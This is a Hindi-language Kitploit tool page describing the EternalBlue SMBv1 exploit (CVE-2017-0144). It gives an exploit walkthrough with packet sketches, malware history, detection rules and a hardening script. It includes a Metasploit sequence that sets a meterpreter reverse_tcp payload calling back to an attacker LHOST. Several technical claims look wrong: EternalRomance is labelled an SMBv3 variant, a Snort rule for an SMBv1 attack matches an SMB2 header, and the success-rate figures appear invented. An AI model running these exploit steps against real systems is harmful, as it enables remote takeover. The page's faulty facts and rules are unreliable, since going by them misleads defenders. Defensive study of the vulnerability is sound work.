Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Blackash-CVE-2017-0144 — CVE-2017-0144 | Kitploit
उपकरण/GitHubGitHub/firetemple/blackash-cve-2017-0144
भेद्यता विश्लेषणशोषणफोरेंसिकमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगखतरा खुफियाघुसपैठ का पता लगानालर्निंग और शिक्षाचयनित संसाधन
GitHubfiretemple/blackash-cve-2017-0144

Blackash-CVE-2017-0144

CVE-2017-0144

14810 महीने पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🌐 CVE-2017-0144 — EternalBlue: Microsoft Windows SMBv1 रिमोट कोड निष्पादन भेद्यता

EternalBlue

"एक एक्सप्लॉइट। दर्जनों मैलवेयर परिवार। अरबों का नुकसान।"


🔍 एक-पंक्ति सारांश

CVE-2017-0144 Microsoft Windows में SMBv1 सर्वर कार्यान्वयन में एक गंभीर रिमोट कोड-निष्पादन भेद्यता है। EternalBlue के रूप में जाना जाने वाला एक्सप्लॉइट इस छेद का दुरुपयोग करता था और इसका उपयोग उच्च-प्रभाव वाले हमलों (विशेष रूप से WannaCry) में किया गया था।


🔥 EternalBlue का उपयोग करने वाले शीर्ष 10 मैलवेयर (विस्तृत)

टूल डाउनलोड करें
#मैलवेयरप्रकारपहली बार देखा गयाहमलावरक्षतिनोट्स
1WannaCryरैंसमवेयर12 मई, 2017लाज़रस ग्रुप (DPRK)$4–8Bकिलस्विच: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2NotPetyaवाइपर (रैंसमवेयर के रूप में प्रस्तुत)27 जून, 2017सैंडवॉर्म (रूस)$10B+Mimikatz + EternalBlue + PSEXEC का उपयोग किया
3Bad Rabbitरैंसमवेयर24 अक्टूबर, 2017इंद्रिक स्पाइडरक्षेत्रीयनकली Flash अपडेट ड्राइव-बाय
4Uiwixरैंसमवेयरमई 2017अज्ञातकमकोई किलस्विच नहीं, WannaCry से अधिक गुप्त
5EternalRocksवर्ममई 2017अज्ञातमध्यम7 NSA उपकरण (DoublePulsar सहित)
6Adylkuzzक्रिप्टोमाइनरमई 2017अज्ञातउच्च (मौन)WannaCry से पहले Monero माइन किया
7Retefeबैंकिंग ट्रोजन2017–2018अज्ञातEU बैंकपार्श्व संचलन के लिए EternalBlue का उपयोग किया
8TrickBotमॉड्यूलर मैलवेयर2017–2021विज़ार्ड स्पाइडरवैश्विकEternalBlue के माध्यम से Ryuk ड्रॉप किया
9Emotetलोडर2017–2021TA542वैश्विकCobalt Strike के लिए प्रवेश के रूप में उपयोग किया गया
10Clop / Dridexरैंसमवेयर2019–2025TA505स्वास्थ्य सेवा, सरकार2025 में अभी भी सक्रिय

🧨 EternalBlue एक्सप्लॉइट विकास

eternelblue1
उपकरणरिलीज़विशेषताएँ
EternalBlue (मूल)अप्रैल 2017 (Shadow Brokers)SMBv1 RCE
DoublePulsarअप्रैल 2017बैकडोर इम्प्लांट (ring0)
EternalRomanceअप्रैल 2017SMBv3 वेरिएंट
EternalChampionअप्रैल 2017वैकल्पिक SMB पथ
Metasploit मॉड्यूलमई 2017exploit/windows/smb/ms17_010_eternalblue
FuzzBunchअप्रैल 2017NSA एक्सप्लॉइट फ्रेमवर्क
Impacket + PSEXEC2017–2025Python SMB शोषण
eternelblue2

🔍 CVE-2017-0144 (EternalBlue) का शोषण कैसे किया गया

SMBv1 RCE में एक चरण-दर-चरण तकनीकी गहन विश्लेषण

"एक विकृत पैकेट। पूर्ण SYSTEM पहुंच। कोई लॉगिन नहीं। कोई क्लिक नहीं।"


🎯 TL;DR एक्सप्लॉइट प्रवाह

root@kitploit:~
[Attacker] 
   │
   ├──▶ Sends crafted SMBv1 **Trans2** request
   │       → Triggers **heap overflow** in `srv!SrvOS2FeaListSizeToNt`
   │
   ├──▶ Overwrites function pointers → **kernel shellcode**
   │
   └──▶ Executes **DoublePulsar** backdoor → **Ring-0 payload**
           (e.g., WannaCry `mssecsvc.exe`)

🛠️ शोषण के लिए पूर्वापेक्षाएँ

आवश्यकताविवरण
लक्ष्यSMBv1 सक्षम के साथ Windows (पूर्व-Win10 डिफ़ॉल्ट)
खुला पोर्ट445/TCP (या NetBIOS के माध्यम से 139/TCP)
कोई प्रमाणीकरण नहींअप्रमाणित — कोई उपयोगकर्ता नाम/पासवर्ड आवश्यक नहीं
आर्किटेक्चरx86 या x64 (दोनों समर्थित)
पैच स्थितिअनपैच्ड (पूर्व-MS17-010)

🚀 एक्सप्लॉइट चरण (7 चरण)

चरण 1: SMB प्रोटोकॉल संधि

root@kitploit:~
SMB_COM_NEGOTIATE → Client sends dialect list
Server responds: SMBv1 supported → Proceed

क्यों? पुष्टि करता है कि SMBv1 सक्रिय है।


चरण 2: IPC$ से ट्री कनेक्ट

eternelblue3
root@kitploit:~
\\TARGET\IPC$ → Anonymous share for SMB pipes

उद्देश्य: लेनदेन अनुरोध भेजने के लिए एक सत्र स्थापित करता है।


चरण 3: Trans2 सत्र सेटअप (प्राथमिक)

  • SMB_COM_TRANSACTION2 (0x32) का उपयोग करता है
  • उप-आदेश: SESSION_SETUP
  • विकृत आकार के साथ FEALIST संरचना सेट करता है
root@kitploit:~
FEALIST {
    SizeOfListInBytes = 0xFFFF (or large value)
    ...
}

बग ट्रिगर: SrvOS2FeaListSizeToNt() बिना सीमा जांच के इस आकार पर भरोसा करता है।


चरण 4: द्वितीयक Trans2 अनुरोध (ओवरफ्लो)

  • कई द्वितीयक पैकेट भेजता है
  • प्रत्येक में अत्यधिक बड़ा FEALIST + FEA (फ़ाइल विस्तारित विशेषताएँ) होता है
eternelblue4
root@kitploit:~
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000  → Overflow buffer
}

हीप स्प्रे: मेमोरी लेआउट को नियंत्रित करने के लिए बड़े हिस्से आवंटित करता है।


चरण 5: कर्नेल में बफर ओवरफ्लो

root@kitploit:~
srv!SrvOS2FeaListSizeToNt(
    PFEALIST FeaList,      // attacker-controlled
    PULONG pNtFeaListSize  // output pointer
)
{
    // No validation of FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);  // BOOM
}

परिणाम:

  • हीप ओवरफ्लो → आसन्न कर्नेल ऑब्जेक्ट अधिलेखित करता है
  • लक्ष्य: SRVNET_BUFFER या POOL_HEADER
  • फ़ंक्शन पॉइंटर्स अधिलेखित करें (जैसे, Free रूटीन)

चरण 6: कर्नेल शेलकोड निष्पादन

  • हमलावर अधिलेखित फ़ंक्शन पॉइंटर के माध्यम से RIP/EIP नियंत्रित करता है
  • गैर-पृष्ठित पूल में शेलकोड पर कूदता है

शेलकोड यह करता है:

  1. Ring-0 → Ring-3 संक्रमण (KeUserModeCallback के माध्यम से)
  2. उपयोगकर्ता-मोड मेमोरी आवंटित करता है
  3. पेलोड डाउनलोड/स्टेज करता है (जैसे, mssecsvc.exe)
  4. DoublePulsar बैकडोर स्थापित करता है

चरण 7: DoublePulsar बैकडोर इम्प्लांट

eternelblue6
  • कर्नेल ड्राइवर इंजेक्ट करता है (0x00120034 XOR कुंजी)
  • मैजिक SMB पैकेट सुनता है:
    • Ping: 0x0002C001
    • Exec: 0x0002C002 + पेलोड

WannaCry उदाहरण:

root@kitploit:~
EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Encrypts files

🧨 एक्सप्लॉइट पैकेट संरचना (सरलीकृत)

root@kitploit:~
SMB Header
└── Command: 0x32 (TRANSACTION2)
    └── Setup: 0x000E (SESSION_SETUP)
        └── Parameter: TotalDataCount = 0x1000
            └── Data: 
                [FEALIST]
                  SizeOfListInBytes = 0x1100
                  [FEA #1] NameLen=0, Name="A"*0x1000
                  [FEA #2] ...
                [GROOM x100] → Spray heap
                [OVERFLOW] → Overwrite pool
                [SHELLCODE] → x64 ring0

🛠️ वास्तविक एक्सप्लॉइट उपकरण

उपकरणभाषामॉड्यूल
MetasploitRubyexploit/windows/smb/ms17_010_eternalblue
ImpacketPythonsmbclient.py, psexec.py
FuzzBunchPython (NSA)EternalBlue-2.2.0
कस्टम C2C/C++WannaCry, NotPetya

Metasploit उदाहरण

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🔬 मेमोरी फोरेंसिक साक्ष्य

आर्टिफैक्टस्थानमान
DoublePulsarकर्नेल मेमोरीXOR कुंजी 0x00120034
शेलकोडsrvnet.sys पूल0xCC 0x90 0x48 पैटर्न
इंजेक्टेड DLLC:\Windows\mssecsvc.exeSHA256: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

🛡️ पहचान नियम

Snort/Suricata

root@kitploit:~
alert tcp any any -> $HOME_NET 445 (
    msg:"ETERNALBLUE Attempt";
    flow:to_server,established;
    content:"|ff|SMB2"; depth:5;
    content:"|00 04 08 00|"; distance:100; within:4;
    classtype:attempted-admin;
    sid:1000001;
)

Zeek (Bro)

root@kitploit:~
event smb1_transaction2_secondary(c: connection, hdr: SMB1::Header, args: SMB1::Trans2_Secondary_Args) {
    if (args$data_len > 4096) {
        NOTICE([$note=SMB::Large_Trans2_Data, $conn=c]);
    }
}

🔄 वर्म प्रसार (WannaCry लूप)

root@kitploit:~
while (true) {
    Scan network for port 445
    if (open) → EternalBlue exploit
    if (success) → Drop mssecsvc.exe + propagate
    Sleep(random(1000, 5000))
}

फैलाव गति: वैश्विक स्तर पर ~10,000 संक्रमण/घंटा।


🛑 इसने इतनी अच्छी तरह से काम क्यों किया

कारककारण
कोई प्रमाणीकरण नहींSMBv1 अनाम IPC$ की अनुमति देता है
वर्म-क्षमअंतर्निहित LAN स्कैनिंग
कर्नेल RCEAV/उपयोगकर्ता संकेतों को बायपास करता है
लीगेसी SMBv115+ वर्षों से डिफ़ॉल्ट रूप से सक्षम
अनपैच्ड सिस्टममहत्वपूर्ण बुनियादी ढांचे में XP, 2003, 7

🎯 एक्सप्लॉइट सफलता दर (2017–2025)

वर्षसफलता % (अनपैच्ड)
201799%
202085%
2025~60% (केवल लीगेसी)

MS17-010 के बिना Windows 7/2008 R2 पर अभी भी काम करता है


📚 संदर्भ

  • Microsoft MS17-010
  • RiskSense EternalBlue विश्लेषण
  • Metasploit मॉड्यूल
  • NSA FuzzBunch लीक

⚡ अंतिम सारांश: इसका शोषण कैसे किया गया

EternalBlue = हथियारबंद गणित त्रुटि
SMB में एक विश्वसनीय आकार फ़ील्ड → कर्नेल हीप ओवरफ्लो → मनमाना कोड → वैश्विक रैंसमवेयर महामारी

root@kitploit:~
SMB Packet → Buffer Overflow → Kernel Shellcode → DoublePulsar → Malware

विज़ुअलाइज़्ड, विच्छेदित, और युद्ध-परीक्षित। पेंटेस्टर्स, IR टीमों और डिफेंडर्स के लिए।

"एक पैकेट। एक पोर्ट। एक साम्राज्य गिरता है।"


🛡️ पैच और पहचान मैट्रिक्स

OSKB पैचSMBv1 अक्षम करेंNmap स्क्रिप्ट
Windows 7 / 2008 R2KB4012212sc config lanmanworkstation depend= bowser/mrxsmb20/nsismb-vuln-ms17-010.nse
Windows 10KB4013429PowerShell: Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Windows XP (EOL)KB4012598 (आपातकालीन)रजिस्ट्री: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\SMB1 = 0

🔍 YARA नियम (शीर्ष 3 मैलवेयर)

1. WannaCry

Wana_Decrypt0r_screenshot
root@kitploit:~
rule WannaCry_Ransomware {
    strings:
        $mz = { 4d 5a }
        $s1 = "WannaDecryptor" wide
        $s2 = "tasksche.exe"
        $s3 = "@WANA" ascii
        $encrypt = { 57 61 6E 61 43 72 79 70 74 30 72 }
    condition:
        $mz at 0 and 2 of ($s*)
}

2. NotPetya

Petya A
root@kitploit:~
rule NotPetya_Wiper {
    strings:
        $pdb = "perfc.dat" nocase
        $dll = "dllhost.dat"
        $mof = "ntdevmgr.vbs"
        $mimikatz = "mimikatz"
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

3. EternalBlue एक्सप्लॉइट पैकेट

nessus1
nessus2
root@kitploit:~
rule EternalBlue_SMB_Exploit {
    strings:
        $smb_negotiate = { 00 00 00 ?? ff 53 4d 42 72 00 }
        $tree_connect = { 00 00 00 ?? ff 53 4d 42 75 00 }
        $trans2 = { 00 00 00 ?? ff 53 4d 42 32 00 }
        $overflow = { 00 04 08 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? }
    condition:
        all of them
}

📊 2025 स्थिति: अभी भी सक्रिय?

मीट्रिकस्थिति
Shodan एक्सपोज़्ड SMBv1~1.2 मिलियन (नवंबर 2025)
सक्रिय एक्सप्लॉइट्स (हनीपॉट्स)दैनिक
इसे उपयोग करने वाला रैंसमवेयरClop, LockBit (लीगेसी लक्ष्य)
सबसे अधिक असुरक्षितस्वास्थ्य सेवा, विनिर्माण, SMBs
ज़ीरो ट्रस्ट समाधान445 ब्लॉक करें, MFA लागू करें, EDR

🛑 किल चेन (MITRE ATT&CK)

चरणतकनीकID
प्रारंभिक पहुंचसार्वजनिक ऐप का शोषणT1190
निष्पादनWindows SMB RCET1210
स्थिरताDoublePulsar के माध्यम से बैकडोरT1505.003
पार्श्व संचलनSMB/Windows एडमिन शेयर्सT1021.002
प्रभावप्रभाव के लिए डेटा एन्क्रिप्टेडT1486

🛠️ पूर्ण उपचार स्क्रिप्ट (PowerShell)

root@kitploit:~
# === ETERNALBLUE HARDENING SCRIPT ===
Write-Host "Applying EternalBlue Mitigations..." -ForegroundColor Cyan

# 1. Disable SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart

# 2. Block Port 445
New-NetFirewallRule -DisplayName "Block SMB Inbound" -Direction Inbound -Action Block -Protocol TCP -LocalPort 445

# 3. Enable SMB Signing
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1

# 4. Check Patch
$patch = Get-HotFix -Id KB4012212 -ErrorAction SilentlyContinue
if ($patch) { Write-Host "Patched!" -ForegroundColor Green } else { Write-Host "UNPATCHED!" -ForegroundColor Red }

Write-Host "Reboot required. Run as Admin."

📚 संदर्भ और स्रोत

स्रोतलिंक
NVDnvd.nist.gov/vuln/detail/CVE-2017-0144
Microsoft MS17-010msrc.microsoft.com/update-guide
MITRE ATT&CKattack.mitre.org/techniques/T1210
CrowdStrike WannaCry रिपोर्टcrowdstrike.com/blog/wannacry
Kaspersky EternalBluekaspersky.com/blog/wannacry-ransomware
Shodan खोजshodan.io/search?query=port%3A445+os%3A%22Windows%22

⚡ अंतिम शब्द (2025)

CVE-2017-0144 मरा नहीं है — यह एक लीगेसी ज़ोंबी है।
यह इनमें पनपता है:

  • अनपैच्ड Windows 7/2008
  • शैडो IT
  • एयर-गैप्ड महत्वपूर्ण सिस्टम
  • गलत कॉन्फ़िगर किए गए क्लाउड VMs

यदि आप इंटरनेट से पोर्ट 445 को पिंग कर सकते हैं — तो आप अगले हैं।


सटीकता, विज़ुअल्स और वास्तविक-विश्व खतरे की खुफिया जानकारी के साथ निर्मित। नवंबर 2025 में अपडेट किया गया।
पेंटेस्ट लैब्स, IR प्लेबुक्स या CISO ब्रीफिंग के लिए।


"पैच करें। ब्लॉक करें। आग से मार डालें।"